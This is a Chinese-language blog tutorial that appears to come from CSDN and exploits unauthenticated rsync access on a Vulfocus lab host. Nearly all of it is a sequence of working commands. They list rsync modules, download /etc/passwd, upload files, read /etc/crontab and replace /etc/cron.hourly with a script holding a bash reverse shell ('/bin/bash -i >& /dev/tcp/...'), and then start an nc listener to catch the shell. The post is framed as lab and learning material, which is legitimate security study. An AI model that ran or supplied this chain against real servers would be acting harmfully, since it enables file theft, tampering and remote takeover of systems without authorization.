码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 应用协议安全:Rsync-common 未授权访问.


    应用协议安全:Rsync-common 未授权访问.

    Rsync 是 Linux 下一款数据备份工具,支持通过 rsync 协议、ssh 协议进行远程文件传输。其中 rsync 协议默认监听 873 端口,如果目标开启了 rsync 服务,并且没有配置 ACL 或访问密码,我们将可以读写目标服务器文件。


    目录:

    应用协议安全:Rsync-common 未授权访问.

    Rsync-common 未授权访问

    靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客

    漏洞的测试:

    第一步:测试漏洞有没有存在.

    第二步:测试 读取文件.

    第三步:测试 下载文件.

    第四步:测试 上传文件.

    第五步:测试 反弹 shell


    Rsync-common 未授权访问

    靶场准备:Web安全:Vulfocus 靶场搭建.(漏洞集成平台)-CSDN博客


    漏洞的测试:

    第一步:测试漏洞有没有存在.

    1. rsync rsync://172.16.10.130:10890
    2. rsync rsync://测试 IP 地址:端口


    第二步:测试 读取文件.

    rsync rsync://172.16.10.130:55803/src/


    第三步:测试 下载文件.

    1. rsync rsync://172.16.10.130:10890/src/etc/passwd ./
    2. rsync rsync://测试 IP 地址:端口/src/etc/passwd 下载到这个文件路径下


    第四步:测试 上传文件.

    1. rsync -av passwd rsync://172.16.10.130:10890/src/tmp/passwd
    2. rsync -av 要上传文件 rsync://172.16.10.130:10890/路径/
    rsync rsync://172.16.10.130:10890/src/tmp/passwd      #读取的文件.


    第五步:测试 反弹 shell

    前提条件先了解:Crontab是一种运行于 Linux系统 下的定时任务管理器。它可以在指定时间执行特定的命令或脚本,并且可以设置重复周期.

    1. 直接下载 crontab 文件:
    2. rsync rsync://172.16.10.130:10890/src/etc/crontab /root/bgxg.txt

    ​


    所以知道他17分钟后执行这个文件,我们就可以创建一个反弹shell的文件来替换他.


    1. touch bgxg #创建新文件.
    2. vim bgxg #编辑文件.
    3. #添加在文件中的内容
    4. /bin/bash -i >& /dev/tcp/172.16.10.130/5566 0>&1
    5. chmod +x bgxg #添加权限.

    ​

    ​


    1. 再进行上传bgxg文件,把cron.hourly替换了
    2. rsync -av bgxg rsync://172.16.10.130:55790/src/etc/cron.hourly

    ​

    ​


    1. 监听这个端口就等着反弹就好.(由于靶场时间比较短,就不等反弹时间了)
    2. nc -lvvp 5566

    ​

       

       

        

     学习链接:第57天:服务攻防-应用协议_Rsync_SSH_RDP_FTP_漏洞批扫_口令猜解_哔哩哔哩_bilibili

  • 相关阅读:
    【STM32】基本定时器
    网站被劫持了怎么办
    [机缘参悟-74]:沟通技巧-无论在职场还是在家,尽量少用反问句
    新的 .NET Upgrade Assistant 版本包含功能更新和 .NET MAUI 改进!
    TikTok短视频引流到直播间的技巧
    Awake()、OnEnable()、Start()、Reset()、OnDisable()、OnDestroy()、OnValidate()
    2-2、依赖注入以及特殊属性的赋值
    如何通过port-forward命令在本地访问 k8s 集群服务
    【Nginx】nginx 解决504超时问题
    【Mysql】联表查询
  • 原文地址:https://blog.csdn.net/weixin_54977781/article/details/134426642
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号